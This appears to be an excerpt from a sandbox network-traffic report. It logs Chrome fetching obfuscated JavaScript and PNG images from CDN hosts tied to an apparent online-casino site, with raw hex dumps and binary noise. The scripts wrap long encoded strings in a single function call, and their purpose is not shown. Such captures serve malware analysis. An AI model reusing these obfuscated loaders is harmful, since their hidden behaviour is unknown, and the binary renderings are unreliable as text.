                                                                                                                                                          2024-06-09 22:41:20 UTC1108INData Raw: 61 34 76 6a 65 75 75 65 28 22 4f 34 55 77 52 67 44 67 68 67 78 67 31 67 4b 51 4d 34 48 73 42 32 45 41 55 42 74 41 6e 41 42 67 45 59 42 64 41 47 67 47 38 41 6c 41 42 51 46 5a 38 41 75 41 4d 77 46 63 30 59 41 58 41 53 33 55 77 39 4a 41 42 4b 63 67 46 39 53 41 46 51 44 73 41 46 67 42 61 7a 4e 70 78 35 6f 2b 41 30 6d 6d 45 41 69 46 6b 68 41 41 43 4a 42 77 42 4f 58 54 70 6f 44 63 41 65 54 41 41 72 45 4a 77 42 30 41 45 78 42 4d 75 61 45 4e 53 4d 6f 49 49 49 78 77 42 50 54 42 42 53 54 51 42 39 4d 4a 41 6b 41 46 6b 55 4a 78 59 41 47 78 42 4e 43 67 41 33 4b 41 53 57 45 41 59 41 51 6e 77 52 51 58 4e 30 6f 7a 30 75 41 46 34 56 54 58 77 59 43 43 5a 4e 51 56 49 6a 4d 76 49 59 46 41 42 62 43 48 51 51 4e 41 34 6b 42 68 62 32 69 47 6f 6f 66 77 38 6a 41 42 6b 75 51 77 56
                                                                                                                                                          Data Ascii: a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtAnABgEYBdAGgG8AlABQFZ8AuAMwFc0YAXAS3Uw9JABKcgF9SAFQDsAFgBazNpx5o+A0mmEAiFkhAACJBwBOXTpoDcAeTAArEJwB0AExBMuaENSMoIIIxwBPTBBSTQB9MJAkAFkUJxYAGxBNCgA3KASWEAYAQnwRQXN0oz0uAF4VTXwYCCZNQVIjMvIYFABbCHQQNA4kBhb2iGoofw8jABkuQwV


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          583192.168.2.55036190.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:20 UTC560OUTGET /pc/240516-03/static/js/components/125/indexFooter.js HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                          Referer: https://js326.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:20 UTC628INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:20 GMT
                                                                                                                                                          Content-Type: application/javascript
                                                                                                                                                          Content-Length: 1640
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Thu, 16 May 2024 08:57:01 GMT
                                                                                                                                                          ETag: "6645ca5d-668"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE1[3],EU-GER-frankfurt-EDGE5-CACHE2[0,TCP_HIT,1],EU-FRA-paris-GLOBAL1-CACHE11[3],EU-FRA-paris-GLOBAL1-CACHE18[0,TCP_HIT,2],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2063156
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 6a4b25469eaf5c2a0eb27af72902bab4
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 528844
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:20 UTC1640INData Raw: 61 34 76 6a 65 75 75 65 28 22 4f 34 55 77 52 67 44 67 68 67 78 67 31 67 4b 51 4d 34 48 73 42 32 45 41 55 42 74 41 6a 4c 67 4e 67 49 46 30 41 61 41 62 77 47 55 41 6d 41 57 78 51 43 34 41 7a 41 56 7a 52 67 42 63 42 4c 64 54 45 55 6a 71 54 51 42 4b 63 67 43 49 57 53 45 41 41 49 6b 48 41 45 35 64 4f 59 67 4e 77 42 35 4d 41 43 73 51 6e 41 48 51 41 54 45 45 79 35 6f 51 41 42 58 6b 6f 49 49 65 52 77 43 65 6d 51 57 49 44 36 7a 6b 45 67 43 79 4b 66 53 77 41 32 49 4d 51 6f 41 4e 79 68 66 46 68 41 47 41 45 49 41 42 67 42 66 59 52 55 51 2b 57 6b 55 41 46 34 30 54 44 45 41 49 54 56 63 4f 44 46 68 55 6d 64 30 33 51 79 55 51 71 35 55 7a 41 79 78 61 4b 34 7a 41 41 73 43 6f 55 7a 6f 6d 41 67 6d 41 73 4b 59 56 50 49 59 46 46 6f 49 64 42 41 30 44 69 51 47 63 6c 6a 53 66 53
                                                                                                                                                          Data Ascii: a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtAjLgNgIF0AaAbwGUAmAWxQC4AzAVzRgBcBLdTEUjqTQBKcgCIWSEAAIkHAE5dOYgNwB5MACsQnAHQATEEy5oQABXkoIIeRwCemQWID6zkEgCyKfSwA2IMQoANyhfFhAGAEIABgBfYRUQ+WkUAF40TDEAITVcODFhUmd03QyUQq5UzAyxaK4zAAsCoUzomAgmAsKYVPIYFFoIdBA0DiQGcljSfS


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          584192.168.2.55035990.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:20 UTC552OUTGET /pc/240516-03/static/js/components/wrapper.js HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                          Referer: https://js326.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:20 UTC641INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:20 GMT
                                                                                                                                                          Content-Type: application/javascript
                                                                                                                                                          Content-Length: 1860
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Thu, 16 May 2024 08:59:00 GMT
                                                                                                                                                          ETag: "6645cad4-744"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE3[2],EU-GER-frankfurt-EDGE5-CACHE3[0,TCP_HIT,0],EU-GER-frankfurt-GLOBAL1-CACHE5[295],EU-GER-frankfurt-GLOBAL1-CACHE8[292,TCP_MISS,294],1.1 google
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 40ce24f826ef8e9ebafe53001f548453
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 1823399
                                                                                                                                                          X-CCDN-Expires: 768616
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:20 UTC1860INData Raw: 61 34 76 6a 65 75 75 65 28 22 4f 34 55 77 52 67 44 67 68 67 78 67 31 67 4b 51 4d 34 48 73 42 32 45 41 55 42 74 41 54 41 64 67 45 34 42 64 41 47 67 47 38 41 52 53 67 4a 51 45 55 41 75 41 4d 77 46 63 30 59 41 58 41 53 33 55 7a 56 4a 43 6b 4f 41 53 6e 49 41 69 46 6b 68 41 41 43 4a 42 77 42 4f 58 54 6d 49 44 63 41 65 54 41 41 72 45 4a 77 42 30 41 45 78 42 4d 75 61 45 41 41 56 35 4b 43 43 48 6b 63 41 6e 70 6b 46 69 41 2b 73 35 42 49 41 73 69 6e 30 73 41 4e 69 44 45 4b 41 44 63 6f 58 78 59 51 42 67 42 43 41 41 59 41 58 32 45 56 45 50 6c 70 4c 67 42 65 44 6b 77 78 53 6e 30 41 44 6d 41 78 59 56 4a 35 64 4e 30 30 54 43 35 43 6c 6e 54 4d 36 4a 67 49 4a 67 4c 53 58 32 71 78 41 44 6b 41 54 51 41 50 4e 55 61 55 56 4d 78 35 54 47 46 4d 63 6c 6a 53 44 57 31 4f 54 46 39
                                                                                                                                                          Data Ascii: a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtATAdgE4BdAGgG8ARSgJQEUAuAMwFc0YAXAS3UzVJCkOASnIAiFkhAACJBwBOXTmIDcAeTAArEJwB0AExBMuaEAAV5KCCHkcAnpkFiA+s5BIAsin0sANiDEKADcoXxYQBgBCAAYAX2EVEPlpLgBeDkwxSn0ADmAxYVJ5dN00TC5ClnTM6JgIJgLSX2qxADkATQAPNUaUVMx5TGFMcljSDW1OTF9


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          585192.168.2.55036223.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:20 UTC614OUTGET /pc/image-pc/index/382/footer/icon_service.png HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                          Referer: https://xpj723.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:20 UTC614INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:20 GMT
                                                                                                                                                          Content-Type: image/png
                                                                                                                                                          Content-Length: 2136
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Wed, 26 Jul 2023 04:33:12 GMT
                                                                                                                                                          ETag: "64c0a208-858"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE4-CACHE1[3],EU-GER-frankfurt-EDGE4-CACHE2[0,TCP_HIT,2],EU-FRA-paris-GLOBAL1-CACHE2[3],EU-FRA-paris-GLOBAL1-CACHE25[0,TCP_HIT,2],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2473789
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 582cdce31ad497597dc366f6cdb5c1be
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 118211
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:20 UTC2136INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 36 00 00 00 36 08 06 00 00 00 8c 45 6a dd 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 03 29 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 39 2e 31 2d 63 30 30 31 20 37 39 2e 61 38 64 34 37 35 33 34 39 2c 20 32 30 32 33 2f 30 33 2f 32 33 2d 31 33 3a 30 35 3a 34
                                                                                                                                                          Data Ascii: PNGIHDR66EjtEXtSoftwareAdobe ImageReadyqe<)iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.1-c001 79.a8d475349, 2023/03/23-13:05:4


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          586192.168.2.550365170.33.9.2274434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:20 UTC453OUTGET /mt-cloud/api/sn.maintain HTTP/1.1
                                                                                                                                                          Host: ahd-ocssn.qqxgo.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          Cookie: aliyungf_tc=3de529fcf893d6d3ee212d9780b2d6d818dae7d7247c306b9d3885f4ac9f9c38
                                                                                                                                                          2024-06-09 22:41:21 UTC369INHTTP/1.1 200
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:21 GMT
                                                                                                                                                          Content-Length: 18
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: Tengine/2.3.0
                                                                                                                                                          Vary: Origin
                                                                                                                                                          Vary: Access-Control-Request-Method
                                                                                                                                                          Vary: Access-Control-Request-Headers
                                                                                                                                                          api-elapsed: 0
                                                                                                                                                          x-server: AkamaiNetStorage(jp15)
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          X-Via: 1.1 aws:jp (Cdn Cache Server V2.0), 1.1 ocsapi:00 (Cdn Cache Server V2.0)
                                                                                                                                                          2024-06-09 22:41:21 UTC18INData Raw: 72 65 71 75 65 73 74 2d 65 6d 70 74 79 2d 37 37 37 0a
                                                                                                                                                          Data Ascii: request-empty-777


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          587192.168.2.550364170.33.9.2274434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:20 UTC457OUTGET /zb-cloud/pwv/sn.settings.get HTTP/1.1
                                                                                                                                                          Host: ahd-ocssn.qqxgo.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          Cookie: aliyungf_tc=3de529fcf893d6d3ee212d9780b2d6d818dae7d7247c306b9d3885f4ac9f9c38
                                                                                                                                                          2024-06-09 22:41:21 UTC282INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:21 GMT
                                                                                                                                                          Content-Length: 24
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: Tengine/2.3.0
                                                                                                                                                          api-elapsed: 0
                                                                                                                                                          x-server: AkamaiNetStorage(jp16)
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          X-Via: 1.1 aws:jp (Cdn Cache Server V2.0), 1.1 ocsapi:00 (Cdn Cache Server V2.0)
                                                                                                                                                          2024-06-09 22:41:21 UTC24INData Raw: e6 97 a0 e6 95 88 e8 af b7 e6 b1 82 28 65 6d 70 74 79 2d 37 37 37 29 0a
                                                                                                                                                          Data Ascii: (empty-777)


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          588192.168.2.55036690.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:20 UTC607OUTGET /pc/image-pc/index/312/nav/casino/03.png HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                          Referer: https://hg679.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:21 UTC629INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:20 GMT
                                                                                                                                                          Content-Type: image/png
                                                                                                                                                          Content-Length: 37611
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Fri, 06 Sep 2019 06:36:45 GMT
                                                                                                                                                          ETag: "5d71fe7d-92eb"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE6[4],EU-GER-frankfurt-EDGE5-CACHE3[0,TCP_HIT,2],EU-GER-frankfurt-GLOBAL1-CACHE4[300],EU-GER-frankfurt-GLOBAL1-CACHE14[0,TCP_HIT,300],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2465102
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 23e3fd10e46e0febec15d460a24e8c16
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 7105850
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:21 UTC15755INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 8b 00 00 00 8b 08 06 00 00 00 51 19 6a ff 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 20 63 48 52 4d 00 00 7a 26 00 00 80 84 00 00 fa 00 00 00 80 e8 00 00 75 30 00 00 ea 60 00 00 3a 98 00 00 17 70 9c ba 51 3c 00 00 00 06 62 4b 47 44 00 00 00 00 00 00 f9 43 bb 7f 00 00 80 00 49 44 41 54 78 da ec fd 75 bc 64 c7 75 ef 0d 7f ab 6a 53 e3 61 18 26 b1 66 c4 cc b2 65 90 4c 71 0c 31 cb 28 4b 86 d8 b9 a1 1b b8 71 92 7b 13 87 13 c7 4e cc cc 89 63 b6 2c 8b c9 62 8d 68 40 23 0d 9e a1 c3 d0 b8 a1 e0 fd 63 77 9f 99 91 51 96 ed dc f7 79 9e d2 67 4b ea 73 fa 74 d7 ae bd 6a d5 82 df fa 2d c1 7f f3 90 c8 ff e6 09 78 d8 70 05 67 bc e6 fd c3 ad a1 13 36 cf 86 c5 41 61 0d 83 f5 f9 fa 12 b3 6f fd f5 1f ba 66
                                                                                                                                                          Data Ascii: PNGIHDRQjgAMAa cHRMz&u0`:pQ<bKGDCIDATxudujSa&feLq1(Kq{Nc,bh@#cwQygKstj-xpg6Aaof
                                                                                                                                                          2024-06-09 22:41:21 UTC16384INData Raw: 36 5a 8c d1 79 cb 16 01 42 3a 24 0a e1 74 07 e7 e2 a1 75 4e 05 26 a5 c0 5a d1 85 4e 00 79 0d 52 a1 50 a0 dd 6e 93 a6 29 85 42 99 2c 4d 75 92 24 99 b1 a6 67 7e 61 21 2a 86 51 ce e3 fb cb 8b 61 1e 6b 45 5e c8 67 84 c7 37 3f f7 d5 49 d4 30 84 45 68 36 79 ee 5b 5e 5b 9a 9f da 95 dd f7 dd ff 4a d1 09 16 81 d7 29 31 33 56 81 b0 cc fe e0 3f 4d bc 7a 8d 3d f1 0d bf 5d f4 50 21 06 d1 4f 12 cf 13 d7 3b 05 60 32 27 d9 15 39 2f 58 6f a5 b7 e2 05 2b cf bb e0 ad 7f ed cd 04 eb b4 1f 30 37 ff c8 d7 ef 1f fb c1 a7 3a f8 85 dc 23 b9 f5 b6 db 2a 38 53 ed 50 06 e7 d8 da 2e f5 c3 af 68 74 cf f7 6e d8 bb a3 86 53 29 65 3c 3a 3a 2a 7b 7d f9 10 b5 d9 12 70 14 41 00 9e 47 1c c7 ec de b5 9b d1 a1 61 96 8f 8c e0 fb 1e 83 03 83 0c 0f 0d 62 b2 84 b9 99 69 b4 35 cc cc 2d 2c 66 c9 a5
                                                                                                                                                          Data Ascii: 6ZyB:$tuN&ZNyRPn)B,Mu$g~a!*QakE^g7?I0Eh6y[^[J)13V?Mz=]P!O;`2'9/Xo+07:#*8SP.htnS)e<::*{}pAGabi5-,f
                                                                                                                                                          2024-06-09 22:41:21 UTC5472INData Raw: eb bb 37 3a 00 7c 40 80 db 0b c1 0e 68 42 14 82 ee 35 4f dd f6 8f db a9 75 b3 60 ce d1 4b aa 41 b0 75 d5 b7 ee ec 9a b9 6c 85 b7 e2 83 37 2d c3 39 51 92 99 03 62 2a a3 cb 6b 53 85 ca 3e 7e 79 cb e7 9e f8 cd 3d 5f 3e bf a4 82 d7 64 08 7f 96 93 c6 e6 a5 40 0f 57 70 22 83 8a 34 36 88 52 d2 7a 12 a6 8e a7 91 45 3b 45 02 59 c0 29 34 a1 32 59 f0 b3 44 51 44 b5 5a c5 71 14 9e eb 21 65 6a 30 15 45 11 ad a5 26 b2 9e 3f aa bc 99 18 4d 2d 89 88 ad 01 df 45 3b 02 eb 38 18 25 90 75 e1 1e 17 81 2f 5d f2 4e 9e 89 0d 53 f0 65 d1 f6 ec ef fd 59 53 43 d3 6b be f0 0f 37 9d 7f c1 85 17 3e 1d a3 30 b2 04 34 81 69 03 33 51 bc fe aa 1b 96 2e be f8 ca ec d3 77 dd d9 5f 68 cc ac 6f 9b 20 96 21 da 79 e2 ee 8f ee 76 d4 ee 67 8f 5f 72 94 20 69 87 70 3f 88 08 23 d5 9f d5 ae f4 c8 34
                                                                                                                                                          Data Ascii: 7:|@hB5Ou`KAul7-9Qb*kS>~y=_>d@Wp"46RzE;EY)42YDQDZq!ej0E&?M-E;8%u/]NSeYSCk7>04i3Q.w_ho !yvg_r ip?#4


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          589192.168.2.55037023.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:20 UTC651OUTGET /pc/image-pc/index/382/service/img_logo.png HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                          Referer: https://zb-hw.czwygs.com/pc/240516-03/static/css/t4044.css
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:21 UTC616INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:21 GMT
                                                                                                                                                          Content-Type: image/png
                                                                                                                                                          Content-Length: 46260
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Wed, 26 Jul 2023 04:33:15 GMT
                                                                                                                                                          ETag: "64c0a20b-b4b4"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE4-CACHE2[4],EU-GER-frankfurt-EDGE4-CACHE2[0,TCP_HIT,2],EU-FRA-paris-GLOBAL1-CACHE7[4],EU-FRA-paris-GLOBAL1-CACHE26[0,TCP_HIT,3],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2473790
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: a8d08ea9d95b88878a72f73cf3206e44
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 118210
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:21 UTC15768INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 64 00 00 01 2c 08 06 00 00 00 f4 10 c9 21 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 03 26 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 30 36 37 20 37 39 2e 31 35 37 37 34 37 2c 20 32 30 31 35 2f 30 33 2f 33 30 2d 32 33 3a 34 30 3a 34 32 20 20
                                                                                                                                                          Data Ascii: PNGIHDRd,!tEXtSoftwareAdobe ImageReadyqe<&iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c067 79.157747, 2015/03/30-23:40:42
